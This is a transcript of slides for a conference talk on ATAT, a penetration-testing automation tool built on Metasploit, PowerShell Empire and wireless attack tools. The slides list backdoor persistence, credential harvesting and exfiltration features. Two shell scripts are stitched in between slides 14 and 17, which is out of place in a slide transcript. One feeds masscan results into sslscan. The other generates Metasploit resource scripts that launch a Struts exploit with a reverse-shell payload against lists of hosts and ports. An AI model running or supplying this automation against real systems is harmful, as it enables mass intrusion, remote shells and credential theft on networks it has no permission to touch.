
Attack Team Automation Tool


Presentation Transcript


  1. Attack Team Automation Tool Taking on the entire rebellion with 2-3 Stormtroopers *with Empire approved images & content

  2. About – ll3N1GmAll Ath, Sec-, C+, D12 • Sith • Hacker • Lock pick village guy • BSidesSTL co-founder • Physical security course instructor • Infosec dentist (see Jayson Street’s talk on failure) • Certified cert haver (with 12 essential certifications & minerals!) • Daniel 11:32b (KJV)

  3. Impetus –(╯°□°)╯︵ ┻━┻ • Vulnerability reports missing items like…ports… • Yeah, apparently that’s a thing • Large scopes, small squads, & tight deadlines • The need to use “Empire approved” existing tools • Features I wish existed; but that didn’t • Efficiency • Repeatability • Automation • Starts services, automates repetitive actions, etc • Noobs

  4. Substance • Simplicity is the best design choice • Well known industry standard Empire approved tools given ergonomic handles and “auto-pilot” functions • PowerShell Empire • Metasploit • Msfvenom • LBD • SSLScan • masscan • MPC • DBD • Still under active development • Fully Automated Windows, OSX, & Linux Privilege Escalation With PowerShell Empire • POC attacks

  5. Origin • Metasploit automation script called “ezsploit” by rand0m1ze on github • ATAT is to ezsploit what SET is to BBQSQL • Nearly identical menu structure and layout • Every existing option has been completely rewritten and/or enhanced significantly • Except for 2; more on those later • Many new options that did not exist in the original script • ATAT has over 500% more Rebel smashing goodness than its predecessor!

  6. Features – Payloads • Create every conceivable Metasploit payload via MPC with ATAT’s built in payload creation “wizard”…I hate that term… • No AV gigs • All OSes • AV WIP

  7. Features – Multi-Target Exploitation • Basically RHOSTS for exploit modules with common options • This feature works with modules whose required options are a subset of LHOST, LPORT, RHOST, RPORT & PAYLOAD • Modules that need more than that are covered by separate menu options for each unique exploit type, as you will see

  8. Features – Multi-Target Struts/Tomcat • RHOSTS feature for Apache Struts & Tomcat exploit modules • Adds: • SRVPORT • TARGETURI • HttpUsername • HttpPassword

  9. Features – Multi-Target Java JMX • RHOSTS feature for the Java JMX exploit module • Adds: • SRVPORT • JMXRMI

  10. Features – Multi-Target Java RMI • RHOSTS feature for the Java RMI exploit module • Adds: • SRVPORT • HTTPDELAY

  11. Features – Multi-Target SNMP Enum • Support for SNMP enumeration AUX module • Integrated for simplicity; not necessity

  12. Features – Multi-Target LBD • Multi-target load balancer detection • All results echo to screen along with being captured in a log within the ATAT directory

  13. Features – Multi-Target Masscan all TCP • Masscan all TCP ports (0-65535) against multiple targets • Rate limited sufficiently to prevent network meltdown; while still scanning very fast • All results echo to screen along with being captured in a log within the ATAT directory • Pause/Resume supported • Automatically feeds SSLScan

  14. Features – Multi-Target SSLScan • Multi-target SSLScan script (auto-fed by masscan/nmap) • All results echo to screen along with being captured in a log within the ATAT directory • Results further sorted into these groups: • RC4, SSLv2, heartbleed, freak, weak ciphers, expired certs, SSL certs found
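The masscan-to-SSLScan hand-off and the result sorting described on slides 13 and 14, as an added example in POSIX sh (not ATAT's own scripts). It assumes masscan's list output format (`-oL`), whose data lines read `open tcp 443 10.0.0.5 1700000000`, and it assumes sslscan's plain-text report wording (`Accepted`, `enabled`, `vulnerable to heartbleed`, `Subject:`); the sample inputs are constructed, and the grep patterns are assumptions to adjust if your sslscan build prints differently. Expired-certificate detection is left out because comparing the `Not valid after` date portably in sh needs more than a pattern match.

```shell
#!/bin/sh
# Feed masscan's open TCP ports into sslscan, log every report, and bucket
# the findings (RC4, SSLv2, heartbleed, weak ciphers, cert found).
# Added example, not ATAT code. Assumes masscan -oL lines and sslscan wording.

# Constructed masscan -oL output; not real scan data.
MASSCAN_SAMPLE='#masscan
open tcp 443 10.0.0.5 1700000000
open tcp 8443 10.0.0.5 1700000001
open tcp 22 10.0.0.6 1700000002
open tcp 443 10.0.0.5 1700000003
# end'

# masscan_targets "<masscan -oL text>": unique host:port lines for sslscan.
masscan_targets() {
    printf '%s\n' "$1" | awk '$1 == "open" && $2 == "tcp" { print $4 ":" $3 }' | sort -u
}

# tls_findings "<sslscan report text>": prints the buckets that apply,
# space separated (RC4 SSLv2 heartbleed weak-ciphers cert), or an empty line.
tls_findings() {
    report="$1"; found=""
    if printf '%s\n' "$report" | grep -q '^Accepted.*RC4'; then
        found="$found RC4"
    fi
    if printf '%s\n' "$report" | grep -qi '^SSLv2[[:space:]]*enabled'; then
        found="$found SSLv2"
    fi
    # "not vulnerable to heartbleed" contains the positive phrase; drop it first.
    if printf '%s\n' "$report" | grep -v 'not vulnerable' | grep -q 'vulnerable to heartbleed'; then
        found="$found heartbleed"
    fi
    # Any accepted cipher below 128 bits counts as weak.
    if printf '%s\n' "$report" | awk '$1 == "Accepted" && $3 + 0 < 128 { weak = 1 } END { exit !weak }'; then
        found="$found weak-ciphers"
    fi
    if printf '%s\n' "$report" | grep -q '^Subject:'; then
        found="$found cert"
    fi
    printf '%s\n' "${found# }"
}

# scan_all "<masscan -oL text>" LOGDIR: run sslscan per target, echo and log
# each report, and append a one-line summary per target (needs sslscan).
scan_all() {
    logdir="$2"; mkdir -p "$logdir"
    for target in $(masscan_targets "$1"); do
        report=$(sslscan --no-colour "$target" 2>&1) || true
        printf '%s\n' "$report" | tee "$logdir/$target.txt"
        printf '%s %s\n' "$target" "$(tls_findings "$report")" >> "$logdir/summary.txt"
    done
}

# Constructed sslscan-style report for 10.0.0.5:443; not real scanner output.
SSLSCAN_SAMPLE='Testing SSL server 10.0.0.5 on port 443
  SSL/TLS Protocols:
SSLv2     enabled
SSLv3     disabled
TLSv1.0   enabled
  Heartbleed:
TLSv1.2 vulnerable to heartbleed
  Supported Server Cipher(s):
Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384
Accepted  TLSv1.0  128 bits  RC4-SHA
Accepted  SSLv2    40 bits   EXP-RC4-MD5
  SSL Certificate:
Subject:  example.internal'

masscan_targets "$MASSCAN_SAMPLE"   # prints 10.0.0.5:443, 10.0.0.5:8443, 10.0.0.6:22
tls_findings "$SSLSCAN_SAMPLE"      # prints: RC4 SSLv2 heartbleed weak-ciphers cert
if [ "${RUN_SSLSCAN:-0}" = 1 ]; then
    scan_all "$MASSCAN_SAMPLE" ./sslscan-logs
fi
```

To produce real input, run masscan with a rate cap and list output, for example `masscan -p0-65535 --rate 1000 -iL hosts.txt -oL scan.txt`, then pass the file contents to `masscan_targets`. Every open port is handed to sslscan, as on the slide; sslscan fails fast on ports that do not speak TLS, so the cost is small and you avoid guessing which non-standard ports carry TLS.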

  15. Features – Bloodhound • Installs Bloodhound and dependencies • Provides instructions for simple 1st time setup • Launches Neo4j console and Bloodhound interface automatically

  16. Features – Multi-Port Exploit • Launch 1 exploit at 1 target on multiple ports • Why? • Remember my earlier mention of vulnerability scan reports with port information missing? • When service identification isn’t providing clear information…_______ all the _______!!! • Non-standard • Banner/ID Fails • RPORTS

  17. Features – Multi-Port Auxiliary • Launch 1 auxiliary module against many hosts (where RHOSTS is supported) & against as many ports on each host as you wish • Basically RPORTS functionality for AUX modules • Again, for checking targets with reports of a vulnerability without complete information about where the service is running • And where the service may not be running on a standard port • Hopefully none of you find yourself in need of these multi-port features; but if you do…nothing else will do… • Searching for things on random ports
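The RHOSTS and RPORTS behaviour described on slides 7, 8, 16 and 17, as an added example in POSIX sh (not ATAT's own code): a generator that writes an msfconsole resource script running one module against every host in a list and every port in a list, with extra options such as TARGETURI passed through. It runs offline and only produces the `.rc` text; the host list, module and payload pairing are illustrative assumptions. For exploit modules it starts a single `exploit/multi/handler` job and sets `DisablePayloadHandler` on the exploit so the listen port is bound once rather than once per run; it emits `set RHOSTS`, which Metasploit 5 and later accept on exploit modules (RHOST is an alias), so on older versions change that to RHOST.

```shell
#!/bin/sh
# Generate an msfconsole resource script that runs one module against every
# host x every port, with one shared handler. Added example, not ATAT code.
# Use the output with: msfconsole -q -r targets.rc

# Constructed target list; not real hosts.
HOSTS='10.0.0.5
10.0.0.6'

# gen_rc MODULE PAYLOAD LHOST LPORT "PORT ..." "HOST<newline>HOST..." ["KEY=VAL ..."]
# PAYLOAD may be empty for auxiliary modules; no handler is started then.
gen_rc() {
    module="$1"; payload="$2"; lhost="$3"; lport="$4"
    ports="$5"; hosts="$6"; extra="${7:-}"
    if [ -n "$payload" ]; then
        # One handler for all runs; ExitOnSession false keeps it up for later sessions.
        printf 'use exploit/multi/handler\n'
        printf 'set PAYLOAD %s\nset LHOST %s\nset LPORT %s\n' "$payload" "$lhost" "$lport"
        printf 'set ExitOnSession false\nexploit -j -z\n'
    fi
    printf 'use %s\n' "$module"
    if [ -n "$payload" ]; then
        printf 'set PAYLOAD %s\nset LHOST %s\nset LPORT %s\n' "$payload" "$lhost" "$lport"
        # The exploit must not try to bind LPORT again; the handler above owns it.
        printf 'set DisablePayloadHandler true\n'
    fi
    # Module-specific options (TARGETURI, HttpUsername, SRVPORT, ...), set once.
    for kv in $extra; do
        printf 'set %s %s\n' "${kv%%=*}" "${kv#*=}"
    done
    # Sequential runs, so each run sees the RHOSTS/RPORT set just before it.
    printf '%s\n' "$hosts" | while read -r host; do
        [ -n "$host" ] || continue
        for port in $ports; do
            printf 'set RHOSTS %s\nset RPORT %s\nrun\n' "$host" "$port"
        done
    done
}

# rc_run_count "<rc text>": how many module runs the script will perform.
rc_run_count() {
    printf '%s\n' "$1" | grep -c '^run$'
}

# Auxiliary example: a version check on two non-standard ports per host.
gen_rc auxiliary/scanner/http/http_version "" "" "" "80 8080" "$HOSTS"

# Exploit example (module/payload pairing is illustrative; pick what fits the target).
gen_rc exploit/multi/http/struts2_content_type_ognl linux/x86/meterpreter/reverse_tcp \
    10.0.0.1 4444 "8080 8443" "$HOSTS" TARGETURI=/struts2-showcase/
```

Redirect the output of a `gen_rc` call to a file and feed it to `msfconsole -r`. Because the runs are sequential, the script is also a record of exactly which host and port each attempt hit, which is the missing piece when a vulnerability report names a finding without the port.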

  18. Features – Listeners & PostEx • Create any type of listener Metasploit has to offer with built in intelligent automated post exploitation features • Identifies the target’s platform • Runs a wide array of applicable post exploitation modules using MSF’s own relied upon logic; but with a larger than normal set of post exploitation modules than MSF’s default

  19. Features – Persistence • Durandal backdoor builder by Skysploit (Travis Weathers) • Updated to work with newer gcc-mingw-w64-i686 compiler • Persistent encrypted daemonized reverse shells for: • Windows • Linux/NetBSD/FreeBSD/OpenBSD • Required significant fixes to function • Persistent encrypted daemonized bind shells for: • Windows • Work in progress • Linux/NetBSD/FreeBSD/OpenBSD • Work in progress • Android Meterpreter APK builder • Encrypted (HTTPS protocol) • Persistent • Stable

  20. Features – Empire & DeathStar • Launches Powershell Empire Console & RESTful API • Launches DeathStar Domain Admin Automation Tool • Admin PSE REST API • Create/Kill/Use • Listeners • Stagers – WIP • Agents • Fully Automated Post Ex • Windows – WIP • Linux – WIP • OSX – WIP

  21. Features – Wireless Attacks • HostAPD-WPE • Enterprise WPA Fake RADIUS Attacks • Enterprise WPA Challenge / Response Pair Cracking • Asleap • John The Ripper • Airgeddon • DoS • WPA/WPA2 Online & Offline Attacks • Aircrack • Hashcat • Handshake tools (capturing & cleaning) • Evil Twin / Rogue AP Attacks • WPS Attacks • Reaver • Bully • WEP Attacks • Why not right? • WiFi Jammer

  22. Features – Data Exfiltration • Push Files via SCP • Creds required • Generates SCP command syntax for uploading to target • Push Files with Powershell & Meterpreter • Starts Apache • Generates MSF command for uploading files to target • Generates PSH command for pulling files from attacker machine to target • Pull Files with Meterpreter • Generates MSF command to download files from target via Meterpreter • Wireless Password Stealer (plaintext) • Windows 32 & 64 bit Credential Harvester • Grabs nearly every imaginable password and private key type

  23. Features – Dependency Checker Prepare, charge, & make ready the laser cannons Installs and/or configures: • PowerShell Empire • DeathStar • pip install various python dependencies • gcc • gcc-mingw-w64-i686 • DBD • Curl • Jq • Bettercap • HostAPD-WPE • Airgeddon • Bloodhound • Etc., Etc., Etc….

  24. Remaining Items –¯\_(ツ)_/¯ • Option 3 – Msfconsole • Shortcut to launch msfconsole; very minor fixes to make this work • Otherwise, no reason to alter this • Option 5 – Armitage • Shortcut to launch Armitage GUI; very minor fixes to make this work • Otherwise, no reason to alter this *this slide not approved by the Galactic Empire

  25. Platforms • Tested on: • Kali • Parrot OS • Kali chroot environment on Android • Use the ATAT-chroot GitHub repo; ATAT-chroot has been customized for use in a Kali chroot environment.

  26. Demo Time • Exploit with automated post exploitation

  27. Source • https://github.com/ll3N1GmAll/ATAT • Compatible with the current gcc-MingW-W64 compiler package that is available on newer systems (32 & 64 bit) • https://github.com/ll3N1GmAll/ATAT-chroot • Ported to chroot environment for Android mobile usage • https://github.com/ll3N1GmAll/ATAT_deprecated • Compatible with the older MingW32 compiler package on older systems (32 & 64 bit) • No longer maintained

  28. Contacts (twits & IRC) • @ll3NiGmAll • Not very active on the twits • ll3N1GmAll • Much more active on IRC • lll3N1GmAlll • Alternate nick • Email/Etc. • Come talk to me
